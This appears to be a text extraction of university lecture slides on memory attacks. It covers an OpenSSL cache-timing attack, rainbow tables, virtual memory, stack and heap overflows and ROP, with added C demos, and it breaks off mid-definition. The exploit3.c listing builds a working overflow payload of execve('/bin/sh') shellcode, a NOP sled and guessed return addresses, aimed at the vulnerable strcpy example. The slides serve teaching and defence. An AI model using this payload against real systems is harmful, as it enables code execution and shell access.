Post on 08-Jul-2020
CS2107 Introduction to Information and System Security
(Slide set 9)
Hugh Anderson
National University of Singapore, School of Computing
October, 2016
Memory... Not yours - the computers!
Outline

1 Tutorial: OpenSSL side-channel attack (Feb 2014); Reversing a hash
2 Memory issues: Memory usage, memory architecture in an OS; Specific direct attacks; OpenSSL Heartbeat/memory attack (April 2014)
Resources

For this lecture, from SEv2.pdf, section 4.4.
http://phrack.org/issues/49/14.html
http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html
OpenSSL side channel attack

OpenSSL: An important bit of security software
Why? Because it is used in about 60% of all web based ssl (https) servers. As a result of this we are very interested in bugs in openssl. It may be the software most closely examined for security errors - all 700,000 lines of code!

What is the (one second) attack?
From the paper at http://eprint.iacr.org/2014/140.pdf:

"Our attack recovers the scalar k and thus the secret key of the signer and would therefore allow unlimited forgeries."

The attack is a side-channel attack on the CPU's instruction cache. An attacker running on the same machine can determine whether a particular piece of code has been cached or not; if it has just been executed, it will be cached. The paper does this with the FLUSH+RELOAD technique: evict a cache line, wait, then time a reload of it.

Timing attack on a constant time function!

Simple double-and-add, and the Montgomery ladder:

    Simple:
        Q = O;
        foreach bit in key {
            Q = 2Q;
            if (bit == 1) {
                Q = Q + P;
            }
        }
        return Q;

    Montgomery ladder:
        R0 = O; R1 = P;
        foreach bit in key {
            if (bit == 0) {
                R1 = R0 + R1; R0 = 2R0;
            } else {
                R0 = R0 + R1; R1 = 2R1;
            }
        }
        return R0;

Both functions return the same result (the point kP), but the ladder does one add and one double for every bit, whatever its value, so the amount of work does not depend on the key... OpenSSL is built with security in mind, so (of course) it uses the Montgomery ladder, which runs in constant time. Notice, though, that which of the two branches runs still depends on the bit.
OpenSSL running a program

As the openssl program runs, the CPU copies the code it executes from program memory into the instruction cache (FOR SPEED!): a fetch from program memory takes about 70 nS, from the cache about 1 nS. Code is moved in cache "lines", and a line is cached when the code in it is first used. The attacker's process runs on the same CPU and shares that cache.

[Figure: the ladder loop in ec2_mult.c, spread over four cache lines A, B, C, D:
    if (word & mask) {
        if (!gf2m_Madd(group, ...
        if (!gf2m_Mdouble(group, ...
    } else {
        if (!gf2m_Madd(group, ...
        if (!gf2m_Mdouble(group, ...
    }
]

If bit is a "1" THIS is cached...
[Figure: the cache lines holding the if-branch are loaded into the instruction cache; the lines holding the else-branch are not.]
(and the attacker can determine this by seeing how fast the four cache lines A, B, C, D are loaded)

If bit is a "0" THIS is cached...
[Figure: the cache lines holding the else-branch are loaded into the instruction cache; the lines holding the if-branch are not.]
(and the attacker can determine this by seeing how fast the four cache lines A, B, C, D are loaded)
OpenSSL timing

Original openssl-1.0.1f/crypto/ec/ec2_mult.c:

    ...
    if (word & mask) {
        gf2m_Madd(..., x1, ...
    } else {
        gf2m_Madd(..., x2, ...
    }

Each bit of a word is being tested, and depending on the bit we take two different paths. The paths occupy different (code) memory locations. If a particular path is taken, then a particular memory location will be cached, and an attacker can (afterwards) discover that, because that memory location will load faster. In this way an attacker can determine which path was taken and hence the value of each bit.

Fixed openssl-1.0.1g/crypto/ec/ec2_mult.c:

    ...
    BN_consttime_swap(word & mask, x1, x2, ...
    gf2m_Madd(...
    BN_consttime_swap(word & mask, x1, x2, ...

We use a constant-time swap to move the operands the current bit needs into the same variables, so the same instructions at the same code addresses run whether the bit is 0 or 1; only the data differs. BN_consttime_swap itself is written with mask arithmetic rather than a branch on the bit, so there is no branch left for the instruction cache to reveal.
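An added example, not OpenSSL's code: a branch-free conditional swap of the kind BN_consttime_swap performs, and a Montgomery ladder built on it, next to the branchy double-and-add loop. Modular exponentiation (group operation = multiplication modulo an assumed prime P) stands in for the elliptic-curve point addition and doubling in ec2_mult.c; the ladder is the same algorithm for any group. Names ct_swap, pow_branchy and pow_ladder_ct are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define P 4294967291u   /* 2^32 - 5, a prime; assumed modulus for the demo */

/* Swap *a and *b when cond is 1, leave them when cond is 0, running the
 * same instructions against the same addresses in both cases. */
static void ct_swap(uint32_t *a, uint32_t *b, uint32_t cond)
{
    uint32_t mask = (uint32_t)0 - (cond & 1u);   /* 0x00000000 or 0xffffffff */
    uint32_t t = (*a ^ *b) & mask;
    *a ^= t;
    *b ^= t;
}

static uint32_t mulmod(uint32_t a, uint32_t b)
{
    return (uint32_t)(((uint64_t)a * b) % P);
}

/* The "simple" loop from the slide: which code path runs depends on
 * each key bit, which is exactly what the instruction cache reveals. */
uint32_t pow_branchy(uint32_t base, uint32_t exp)
{
    uint32_t q = 1;                          /* identity element (O) */
    for (int i = 31; i >= 0; i--) {
        q = mulmod(q, q);                    /* Q = 2Q */
        if ((exp >> i) & 1u)
            q = mulmod(q, base);             /* Q = Q + P, for 1 bits only */
    }
    return q;
}

/* Montgomery ladder with conditional swaps: identical instruction stream
 * for every bit; only which value sits in R0 and R1 changes. */
uint32_t pow_ladder_ct(uint32_t base, uint32_t exp)
{
    uint32_t r0 = 1, r1 = base;              /* R0 = O, R1 = P */
    for (int i = 31; i >= 0; i--) {
        uint32_t bit = (exp >> i) & 1u;
        ct_swap(&r0, &r1, bit);
        r1 = mulmod(r0, r1);                 /* R1 = R0 + R1 */
        r0 = mulmod(r0, r0);                 /* R0 = 2R0 */
        ct_swap(&r0, &r1, bit);
    }
    return r0;
}

int main(void)
{
    uint32_t k = 0xdeadbeefu, g = 3;
    printf("branchy: %u  ladder: %u\n", pow_branchy(g, k), pow_ladder_ct(g, k));
    return 0;
}
```

The invariant is R1 = R0 * base throughout, which is why the swap-then-operate-then-swap-back form computes the same thing as the two-branch ladder on the slide. One caveat a practitioner should keep in mind: the compiler may still turn mask arithmetic into a conditional branch at high optimisation levels, so constant-time code has to be checked at the machine-code level, not just at the C level.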
Reversing a hash...

Precomputed tables for helping reverse a hash?
A precomputed table for 10-character (A-Z, a-z, 0-9) passwords would have 62^10 = 839,299,365,868,340,224 entries, each containing a 16-byte value. That's a big disk (about 13,000,000 TB).
Indexing by hash is even worse. We do not really have names for disks that big.

    Password    (MD5) Hash
    aaaaaaaa    3dbe00a1676...
    aaaaaaab    2125ea8b81b...
    aaaaaaac    ea67f32d4e6...
    aaaaaaad    746a8ab05d6...
    aaaaaaae    c554d695eb0...
    aaaaaaaf    09eb61fd25b...
    aaaaaaag    68b5af18408...
    ...         ...
Reversing a hash: "rainbow" tables

Precompute long chains, but only keep two values
Precompute chains of values starting from a password guess, alternately applying the hash function h(p) and a reversing (reduction) function r(h), which generates a predictable, plausible guess from the hash.
Only store the first and last entries from the chain. It is space efficient, and you can re-compute the intermediate values (a space-time tradeoff).

[Figure: two example chains.
 Chain #1 (compute): aaaaaaaaa -h(p)-> ... -r(h)-> ... alternating h(p) and r(h) through 0a224fad.., mlacziryt, 2399afb0.., xyuivlzrs ... ending at f0e377b6..
 Chain #2 (compute): srxx21try -h(p)-> 4fad6544.. -r(h)-> asbdhdf13 -h(p)-> d001afde.. -r(h)-> cracyl13d -h(p)-> fedc1234..
 Store: only the ends, (aaaaaaaaa, f0e377b6..) and (srxx21try, fedc1234..).]
Reversing a hash: "rainbow" tables

Precompute long chains, but only keep two values
[Figure: reversing the hash d001afde..
 1. Compute chain from hash: r(d001afde..) = cracyl13d, h(cracyl13d) = fedc1234..
 2. Compare candidates with chain ends: fedc1234.. is the stored end of the chain that starts at srxx21try.
 3. Recompute that chain to reverse the hash: h(srxx21try) = 4fad6544.., r(4fad6544..) = asbdhdf13, h(asbdhdf13) = d001afde..
 4. Password: asbdhdf13]

In practice: ophcrack, on the old LM Windows hash
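An added example, not from the slides or from ophcrack: the chain construction and the four lookup steps above, in C, over a 3-letter lowercase password space. The hash is FNV-1a standing in for MD5 or LM (an assumption for the demo, not a cryptographic hash), and the reduction function takes the column index as well as the hash, which is the refinement that makes a table a "rainbow" table rather than a plain chain table with a single r(h). Names hash_fn, reduce_fn, build_table, password_at and lookup are mine.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PLEN      3          /* password length */
#define CHAIN_LEN 100        /* hashes per chain */
#define NCHAINS   400        /* chains stored */
static const char ALPHA[] = "abcdefghijklmnopqrstuvwxyz";

typedef struct { char start[PLEN + 1]; uint32_t end; } Entry;
static Entry table[NCHAINS];          /* only (start, end) is kept */

/* h(p): FNV-1a 32-bit, a toy stand-in for MD5. */
uint32_t hash_fn(const char *p)
{
    uint32_t h = 2166136261u;
    for (; *p; p++) { h ^= (uint8_t)*p; h *= 16777619u; }
    return h;
}

/* r(h, col): turn a hash into a plausible password; differs per column
 * so that chains which collide in one column do not merge afterwards. */
void reduce_fn(uint32_t h, int col, char out[PLEN + 1])
{
    uint32_t v = h + (uint32_t)col * 0x9e3779b9u;
    for (int i = 0; i < PLEN; i++) { out[i] = ALPHA[v % 26]; v /= 26; }
    out[PLEN] = '\0';
}

/* The password at column col of the chain starting at start (col 0 = start). */
void password_at(const char *start, int col, char out[PLEN + 1])
{
    uint32_t h = hash_fn(start);
    strcpy(out, start);
    for (int i = 0; i < col; i++) { reduce_fn(h, i, out); h = hash_fn(out); }
}

/* Continue a chain from the hash in column col down to its final hash. */
static uint32_t walk_to_end(uint32_t h, int col)
{
    char p[PLEN + 1];
    for (int i = col; i < CHAIN_LEN - 1; i++) { reduce_fn(h, i, p); h = hash_fn(p); }
    return h;
}

/* Precompute: chain starts are generated deterministically (constructed). */
void build_table(void)
{
    for (int n = 0; n < NCHAINS; n++) {
        uint32_t v = (uint32_t)n * 2654435761u + 12345u;
        for (int i = 0; i < PLEN; i++) { table[n].start[i] = ALPHA[v % 26]; v /= 26; }
        table[n].start[PLEN] = '\0';
        table[n].end = walk_to_end(hash_fn(table[n].start), 0);
    }
}

/* Steps 1-4 from the slide: guess the column the target hash sits in,
 * walk to a chain end, match stored ends, recompute that chain. */
int lookup(uint32_t target, char out[PLEN + 1])
{
    for (int col = CHAIN_LEN - 1; col >= 0; col--) {
        uint32_t end = walk_to_end(target, col);
        for (int n = 0; n < NCHAINS; n++) {
            if (table[n].end != end) continue;
            password_at(table[n].start, col, out);
            if (hash_fn(out) == target) return 1;     /* genuine hit */
            /* else a false alarm from a chain collision: keep looking */
        }
    }
    return 0;
}

int main(void)
{
    char p[PLEN + 1], found[PLEN + 1];
    build_table();
    password_at(table[3].start, 17, p);        /* a password the table covers */
    if (lookup(hash_fn(p), found))
        printf("%08x -> %s\n", hash_fn(p), found);
    return 0;
}
```

The lookup tries every possible column because it does not know where in a chain the target hash occurred; with a per-column reduction that costs about CHAIN_LEN^2/2 steps per lookup, which is the time side of the space-time tradeoff. Coverage is probabilistic: a password that never appears in any chain cannot be recovered, and real tables are sized (and built from many chains) to make that unlikely.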
Outline of memory usage

We will...
Discuss the use of computer memory in an OS
Discuss storage techniques for data
Outline the properties of the stack, main memory and the heap

What is memory used for?
To store programs (maybe in code or text segments).
To store data - variables, constants, strings... (in a data segment)
To store local transitory data such as return addresses when you call a function or method, and local method variables (in the stack segment).

What do you mean... Return address?
... and what is a stack when it is at home?
How programs use memory for return addresses

Return addresses need to be nested, so we use a stack:

    10 readInput() {
    ..   ...
    24 }
    31 processItem() {
    32   ...
    37 }
    43 processData() {
    44   ...
    45   processItem();     // Save away 46 and call processItem()
    46   ...
    54 }
    65 main() {
    66   ...
    67   readInput();       // Save away 68 and call readInput()
    68   ...
    69   ...
    70   ...
    71   processData();     // Save away 72 and call processData()
    72   ...
    73 }

[Figure: the stack as this runs.
 main() at line 67 calls readInput(): save away 68.            Stack: [68]
 readInput() finishes at line 24: return to the most recent saved away address (68).   Stack: []
 main() at line 71 calls processData(): save away 72.          Stack: [72]
 processData() at line 45 calls processItem(): save away 46.   Stack: [72, 46]
 processItem() finishes at line 37: return to the most recent saved away address (46). Stack: [72]
 processData() finishes at line 54: return to the most recent saved away address (72). Stack: []]

A little warning...
Later, we will use stacks that are upside down, because that is how computers use stacks - they grow towards lower/smaller addresses.
How programs use memory for data

Storing a string will come back to haunt us...
Operating systems, and many applications, are written in C.
In C, a string like Hello is stored in six successive bytes: the five characters and a NULL terminating character. This allows a compact representation and fast access to a string, but nothing records how much room the buffer holding it has. In Java, by contrast, a string is stored as an object. For a five-character string the storage takes up 48 bytes: an object containing the actual characters, an integer offset into the array at which the string starts, the length of the string, and another int. This results in a less compact representation and slower access, but the length is always known and checked.

When memory is needed by a program at run time, it is allocated from the heap:
The C library calls are malloc() and free(); the library asks the OS for more address space as the heap grows. Java maintains its own heap, separate from the C heap. When lots of allocations and deallocations are being made, the heap may become fragmented. Java's runtime runs a garbage collector, which also compacts its heap from time to time. The C heap has no garbage collector; its allocator instead merges adjacent free chunks when memory is freed (which matters for the heap attack later).
Memory hierarchy

For small embedded systems: one level of memory
Program variables are next to each other in memory - no protection between processes.
Primary memory (RAM/ROM) may store and retrieve values in 20 nS.

For Windows/GNU+Linux: protection, and a hierarchy...
Process variables in memory are not visible to other processes.
There is a hierarchy of memory:
Values in a register or cache are accessed in less than 1 nS,
Primary/physical memory (ROM/RAM) may take 10 nS to access,
Secondary memory (i.e. a disk) - milliseconds access time.
Windows/GNU+Linux: virtual memory addressing
OverviewModern operating systems and hardware give each process anindividual address space - normally starting at address 0.
These addresses cannot directly map onto the same address ofreal memory, because then each process would just be seeing thesame memory.
Instead a translation unit maps this virtual address to a real physicaladdress.
It is common for a virtual address space to be the entire hardwareaddress space of the processor - that is the address range theprocessor could access using all its address lines.
Process use of memory

Virtual memory, physical memory, and translations...
[Figure: prog 1, prog 2 and the OS kernel each have their own virtual memory; translations map each onto physical memory.]
The processes, and the OS kernel, each have their own view of memory, somehow mapped/translated to the real (physical) memory.
Virtual memory

Simple memory versus VM memory
[Figure: simple memory: the CPU's address and data buses go straight to ROM/RAM, so address 0002 reads location 2. VM memory: the CPU's address goes to the MMU, whose table maps the virtual address to a physical address (the lower-order address lines pass straight through as the offset), which then selects RAM, ROM or I/O; a high-speed disk backs pages that are not in RAM.]
Virtual memory also allows the execution of programs that may not reside completely in memory, by using disk to act as memory.
VM systems may provide a virtual address space much larger than the physical address space.
GNU+Linux memory allocation

[Figure: two 32-bit address space layouts. A 2G/2G split: user 0x00000000..0x7fffffff, kernel 0x80000000..0xffffffff. The 3G/1G split that 32-bit GNU+Linux uses by default: user 0x00000000..0xbfffffff, kernel 0xc0000000..0xffffffff.]
OS Kernel contains drivers, system stacks, page tables...
User contains executable code, libraries, stacks...

... and swap ...
Secondary storage (disk) stores memory contents. The part of the disk used in this way is called the 'swap' - it may be either a file used for the purpose, or a partition of disk.
It is common for VM systems to have a swap area two to ten times as large as the physical memory.
VM=paging+segments (+disk)...

The Intel CPU chip can use both segmentation and paging:
[Figure: a logical address cs:offset (e.g. 0x00201217). The 16-bit selector in CS (index and mode bits) is looked up in the GDT or LDT, giving a segment base and limit; base + offset, checked against the limit, is the 32-bit linear address (e.g. 0xc0132217). The linear address is split as dddddddddd tttttttttt oooooooooooo: a 10-bit page directory index, a 10-bit page table index and a 12-bit offset; page directory -> page table -> frame gives the physical address.]
Process view: GNU+Linux ELF format segments

Program, shared libraries, stack...
[Figure: Linux/ELF user memory from 0x00000000 to 0xbfffffff. A guard region at the bottom; the program (code, data, bss) from 0x00010000; malloc'ed memory "above" the program; the C libraries (code, data, bss) at 0x40000000; the stack at the top, below a guard region, growing downwards. The figure also marks 0x84000000.]
Malloc'ed memory "above" the program...
Stack grows downwards...
Summary...

Use and architecture of memory:
Memory is used to store programs, data, and the stack.
Simple memory systems are found in embedded systems (e.g. smartcards), where there is no protection of memory.
Complex memory systems manage heaps of memory for use by programs. Java maintains its own heap.
Applications use malloc() and free() to get memory from the heap and give it back.
Larger operating systems use VM (virtual memory):
VM may use segments (e.g. a code segment, a data segment or a stack segment), and
VM may use paging (i.e. memory managed in small fixed-size chunks).
Segments are protected from each other.
GNU+Linux and Windows both use paging and segments.
Remember also the swap area on disk, and page faults.
Attacks based on the computer's memory

In all this complexity... there are many memory attacks:
Direct attacks on protected and unprotected memory systems.
Direct attacks on the processor, its memory management hardware, and the page fault system.
Attacks on the disk/swap space.
Attacks on the system heap, the Java heap, the garbage collectors.
Attacks on the page tables, the segment tables.

We will start with the two most well known:
Memory attack 1: Stack/buffer overflows; how they happen, and approaches to reduce the likelihood of an attack.
Memory attack 2: Heap/buffer overflows; how they happen, and approaches to reduce the likelihood of an attack.

Memory attack 1: stack/buffer overflow

Most well known compromise of computer systems
One of a general class of problems caused by software that does not check its parameters for extreme values.
The attack mechanism is:
Find a program that accepts input from us (or our attacking program), and uses a buffer (a buffer is just an array you are using for temporary storage) without checking bounds.
Deliver an EGG to it to overflow the buffer.
Overwrite the stack return address with the address of OUR code.
The program then runs OUR code.
Need to examine the way programs use memory.
Presentation based on http://phrack.org/issues/49/14.html
Memory attack 1: simple program

A pretty simple program...

CODE LISTING vulnerable.c
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[512];
        printf("Argument is %s\n", argv[1]);
        strcpy(buffer, argv[1]);   /* no length check: an argument of more than 511 bytes runs off the end of buffer */
        return 0;
    }

When we run it:
    [hugh@pnp176-44 programs]$ ./vulnerable test
    Argument is test
    [hugh@pnp176-44 programs]$
but...
Memory attack 1: simple program

Normal operation
[Figure: the stack (growing down) in the computer's memory holds, from higher to lower addresses: the arguments, the return address, then the variables, including Buffer (512 bytes).]

Overwrite the end of an array, with an "EGG"
[Figure: the copy runs past the end of Buffer, up through the other variables and over the return address.]
Memory attack 1: Code creates EGG...

CODE LISTING exploit3.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define DEFAULT_OFFSET      0
    #define DEFAULT_BUFFER_SIZE 512
    #define NOP                 0x90

    /* i386 Linux execve("/bin/sh") shellcode, written so it contains no zero bytes */
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* i386 only: leaves %esp in %eax, which is where gcc expects the return value */
    unsigned long get_sp(void)
    {
        __asm__("movl %esp,%eax");
    }

    int main(int argc, char *argv[])
    {
        char *buff, *ptr;
        long *addr_ptr, addr;
        int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
        int i;

        if (argc > 1) bsize = atoi(argv[1]);
        if (argc > 2) offset = atoi(argv[2]);

        if (!(buff = malloc(bsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }

        addr = get_sp() - offset;            /* guess where the EGG will land on the victim's stack */
        printf("Using address: 0x%lx\n", addr);

        /* fill the whole buffer with the guessed address (4-byte longs assumed) ... */
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i += 4)
            *(addr_ptr++) = addr;

        /* ... then a NOP sled in the first half ... */
        for (i = 0; i < bsize / 2; i++)
            buff[i] = NOP;

        /* ... then the shellcode in the middle; the copies of addr stay at the end */
        ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
        for (i = 0; i < strlen(shellcode); i++)
            *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';
        memcpy(buff, "EGG=", 4);             /* hand the EGG to the victim as an environment variable */
        putenv(buff);
        system("/bin/bash");                 /* a shell with $EGG set, from which to run the victim */
        return 0;
    }
Smashing the stack - the payload!

Contents of the payload
[Figure: the payload in the computer's memory: multiple no-op instructions (a NOP sled), then the machine code for the exploit, then multiple copies of the malicious return address, which land on the stack's saved return address.]
A C program which calls a shell...
#include <stdio.h>void main() {
char *nm[2];nm[0] = "/bin/sh";nm[1] = NULL;execve(nm[0], nm, NULL);
}
movl string,string_addrmovb $0x0,null_bytemovl $0x0,null_addrmovl $0xb,%eaxmovl string,%ebxleal string,%ecxleal null_string,%edxint $0x80 // OS call“/bin/sh” string goes here.
At the left we see some C source code for running the program /bin/sh. Onthe right we see assembler code with extra OS nonsense removed.
Note that the binary code program has “zeroes” in it, andthese will have to be removed if strcpy is to copy the pro-gram onto the stack. We can use translations like:
movb $0x0,null_byte xorl %eax,%eaxmovb eax, null_byte
Using the buffer overflow attack

3 examples of situations in which we can use it
1. A server (say a web server) that expects a query, and returns a response. The demo buffer overflow attack done in class is one of these.
2. A CGI/ASP or perl script inside a web server.
3. A SUID root program on a UNIX system.

Find a program that has a buffer, ... and that does not check its bounds. Then deliver an EGG to it to overflow the buffer. Overwrite the stack return address with the address of OUR code. The program then runs OUR code.

Example attack
Many attacks on Microsoft systems are based on various buffer overflow problems. CA-2003-20 W32/Blaster worm: "The W32/Blaster worm exploits a vulnerability in Microsoft's DCOM RPC interface as described in VU#568148 and CA-2003-16. Upon successful execution...."
Memory attack 1: example

Consider the following scenario...
[Figure: Hugh's mac (hack from here) runs a VM honeypot. The virtual machine is running GNU+Linux, and a (cut down) version of an old version of the Apache web server: the (virtual) web server.]
Memory attack 1(a): web server code...

And in the web server we have this code:

    void process(int newsockfd)
    {
        char line[512];
        ...
        ...
        /* NEXT BIT DOESN'T CHECK THE ARRAY SIZE, i.e. that idx < 511 */
        while (n > 0 && c != '\n') {
            n = read(newsockfd, &c, 1);
            ... add it to line[idx++] ...
        }
        ...
        return;
    }

The general operation of this web server is hackable...
It matches our attack mechanism: a web server receives a file spec (index.html), and does not properly check the buffer that it puts the spec into.
We replace the file spec with the EGG. Note that we will have to use a specialized program to deliver the EGG (i.e. not firefox).
How to fix buffer overflows?

Find them! ... But also...
Use safety technologies:
DEP: Not allowing execution of code in the stack segment (as in Mac OS X/OpenBSD; Windows and GNU+Linux have it too).
ASLR: Address space layout randomization - randomly moving the starting memory locations (stack, heap, libraries) for processes, so the attacker cannot predict the address to return to. Implemented in GNU+Linux since 2005, and in Windows since 2007.
Canaries: putting a value just below the return address (a canary), and checking it before doing a return from subroutine. It is hard to overwrite the return address without overwriting the canary. This is standard now in Visual Studio and gcc compilers.
Use good programming practice:
Always check ranges of parameters, and be careful with arrays. man strcpy
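An added example of the "good programming practice" point, not the honeypot server's code and not from the slides: the read loop from process() rewritten with an explicit bound, next to a bounded replacement for the strcpy() in vulnerable.c. Function names read_line_bounded and copy_bounded are mine; the policy of rejecting an over-long line outright (rather than truncating it and carrying on) is a design choice, explained after the code.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Read one line from fd into line[cap], one byte at a time as the slide's
 * server does, but never past the buffer.  Returns the number of bytes
 * stored (newline dropped), or -1 if the line does not fit. */
long read_line_bounded(int fd, char *line, size_t cap)
{
    size_t idx = 0;
    char c;
    if (cap == 0) return -1;
    for (;;) {
        ssize_t n = read(fd, &c, 1);
        if (n <= 0 || c == '\n') break;      /* EOF, error or end of line */
        if (idx + 1 >= cap)                  /* keep one byte for the terminator */
            return -1;                       /* over-long request: reject it */
        line[idx++] = c;
    }
    line[idx] = '\0';
    return (long)idx;
}

/* strcpy() replacement: refuse anything that does not fit, NUL included.
 * Returns 0 on success, -1 if src is too long for dst. */
int copy_bounded(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    if (len + 1 > cap) return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* vulnerable.c with the copy made safe */
int main(int argc, char *argv[])
{
    char buffer[512];
    if (argc < 2) return 1;
    if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long\n");
        return 1;
    }
    printf("Argument is %s\n", buffer);
    return 0;
}
```

Rejecting rather than silently truncating matters for a server: a truncated request line is still parsed, and truncation has its own history of bugs (a path cut in the middle, a NUL that is never written). Whichever policy you choose, the check is against the buffer's capacity, which is the value the original loop never consulted.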
Memory attack 1(b): return to libc!

Even with DEP: run code already in libc...
[Figure: the buffer overflow overwrites the return address (higher in memory than the buffer) with the address of the C library function system(). You still need to provide an argument for that call, placed on the stack where system() expects it, so you get system("/bin/sh").]
Memory attack 1(c): return oriented programming

Even with DEP: find code snippets, and overwrite stack...
[Figure: code snippets ("gadgets") somewhere in memory, each ending in ret:
    pop eax
    ret

    pop ebx
    ret

    add eax,ebx
    ret

The overflow writes a sequence of return addresses and data above the buffer on the stack (high memory): the address of "pop eax; ret", then 42, the address of "pop ebx; ret", then 212, the address of "add eax,ebx; ret", ....
Resultant execution:
    eax = 42;
    ebx = 212;
    eax += ebx;
    ....]
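An added example, not from the slides: the mechanics behind the figure above, in C. It scans a (constructed) blob of i386 machine code for the three gadgets, lays out the fake stack that chains them with the values 42 and 212, and runs the chain through a tiny interpreter that understands just those three gadgets, so the effect can be checked without executing anything. The load address BASE and the code blob are assumptions for the demo.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define BASE 0x08048000u   /* assumed load address of the text segment */

/* A constructed text segment: ordinary code with gadgets buried in it. */
static const uint8_t text[] = {
    0x55, 0x89, 0xe5,          /* push ebp; mov ebp,esp        (function prologue) */
    0x58, 0xc3,                /* pop eax; ret                 gadget 1 */
    0x31, 0xc0, 0x90, 0x90,    /* xor eax,eax; nop; nop */
    0x5b, 0xc3,                /* pop ebx; ret                 gadget 2 */
    0x8b, 0x45, 0x08,          /* mov eax,[ebp+8] */
    0x01, 0xd8, 0xc3,          /* add eax,ebx; ret             gadget 3 */
    0xc9, 0xc3                 /* leave; ret */
};

/* Offset of the first occurrence of the byte pattern pat in code, or -1. */
long find_gadget(const uint8_t *code, size_t len, const uint8_t *pat, size_t plen)
{
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(code + i, pat, plen) == 0) return (long)i;
    return -1;
}

/* The fake stack, lowest address first: each "return address" is a gadget,
 * followed by the words its pop instructions will consume.  Returns the
 * number of 32-bit words written, or 0 if a gadget is missing. */
size_t build_chain(uint32_t *stack, size_t max_words, uint32_t a, uint32_t b)
{
    const uint8_t pop_eax_ret[] = {0x58, 0xc3};
    const uint8_t pop_ebx_ret[] = {0x5b, 0xc3};
    const uint8_t add_ret[]     = {0x01, 0xd8, 0xc3};
    long g1 = find_gadget(text, sizeof text, pop_eax_ret, 2);
    long g2 = find_gadget(text, sizeof text, pop_ebx_ret, 2);
    long g3 = find_gadget(text, sizeof text, add_ret, 3);
    if (g1 < 0 || g2 < 0 || g3 < 0 || max_words < 5) return 0;
    size_t n = 0;
    stack[n++] = BASE + (uint32_t)g1;   /* lands on the saved return address */
    stack[n++] = a;                     /* popped into eax */
    stack[n++] = BASE + (uint32_t)g2;   /* "returned" to by gadget 1's ret */
    stack[n++] = b;                     /* popped into ebx */
    stack[n++] = BASE + (uint32_t)g3;   /* eax += ebx */
    return n;
}

/* Interpreter for exactly these three gadgets: follow the chain as the
 * CPU's ret instructions would, and report the final eax. */
uint32_t run_chain(const uint32_t *stack, size_t n)
{
    uint32_t eax = 0, ebx = 0;
    size_t sp = 0;
    while (sp < n) {
        uint32_t off = stack[sp++] - BASE;          /* ret pops the next address */
        if (off >= sizeof text) return 0;
        switch (text[off]) {
        case 0x58: eax = stack[sp++]; break;        /* pop eax; ret */
        case 0x5b: ebx = stack[sp++]; break;        /* pop ebx; ret */
        case 0x01: eax += ebx; break;               /* add eax,ebx; ret */
        default: return 0;                          /* not a gadget we know */
        }
    }
    return eax;
}

int main(void)
{
    uint32_t s[8];
    size_t n = build_chain(s, 8, 42, 212);
    printf("chain of %zu words, eax = %u\n", n, run_chain(s, n));
    return 0;
}
```

The point the interpreter makes concrete is that no byte of the attacker's input is ever executed: every address on the fake stack points into code that was already in the process, which is why DEP alone does not stop it, and why ASLR (which makes BASE unknown) is the usual counter.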
Memory attack 2: heap overflow

The younger sibling of the buffer overflow
The heap is managed by the allocator in the C library (malloc/free). Each chunk carries a header, and free chunks are threaded together in a doubly linked free list.
The attacker starts by constructing/coding something that results in the program allocating and deallocating memory from the heap. Then:
After the malloc(), the program writes to the memory, and then returns it using free(). By careful choice of what we write to the memory (writing past its end), we can overwrite the NEXT header in the heap.
The allocator then merges this freed-up memory with its free neighbour, manipulating the headers in order to do so. It rewrites values in the neighbouring headers that are dependent on the values in the next header (the "unlink" step).
If the next header is modified to point to some place where a return address is being kept, then that rewrite puts our chosen value there, and we can run crafted code.
Background reading: http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html
Memory attack 2: heap overflow

Consider the following part of a heap...
[Figure: three chunks on the heap: a chunk of in-use memory, a chunk of free memory, and another chunk of in-use memory. Each header carries forward and backward links (p[0], p[1]) that join the free chunks into a list.]

Memory attack 2: heap overflow

The normal free() and merge...
[Figure, three steps. 1: chunks in-use, free, in-use. 2: "Return this one: free()" is called on one of the in-use chunks. 3: "Then merge the links (garbage collection)": the freed chunk and its free neighbour become one merged (bigger) chunk of free memory. Note that merging involves setting m[p[1]][0] to have the value in p[0], where m[p[1]] is the heap location that p[1] points to, m[p[1]][0] is its forward pointer and m[p[1]][1] is its backward pointer.]
The heap management software automatically rewrites the values of the forward and backward links, using the values in the next links.
Memory attack 2: heap overflow

Consider the scenario where attacker changes pointers...
[Figure, three steps. 1: the attacker's overflow has left the links all messed up: the next header's forward link now holds the address of the return vector, and its backward link holds the address of the bad code. 2: "Return this one: free()". 3: "Then merge the links (garbage collection)": the merge writes the address of the bad code into the return vector. Later the return instruction is done (same as in the buffer overflow), and the system starts executing the bad code.]
The attacker uses the allocator's merge step (the slide calls it the OS garbage collector) to write the address of malicious code into a return-address location, as for the buffer overflow.
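An added example, not from the slides and not a real allocator: the merge/unlink step described above on a toy doubly linked free list, showing how an overwritten next-chunk header turns the two link rewrites into a write of an attacker-chosen value to an attacker-chosen address, and the back-pointer consistency check that glibc's malloc applies against exactly this (its "corrupted double-linked list" abort). Everything here is arrays inside this program: saved_return and shellcode are assumed stand-ins for a return-address slot and for injected code, and nothing is executed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

typedef struct chunk {
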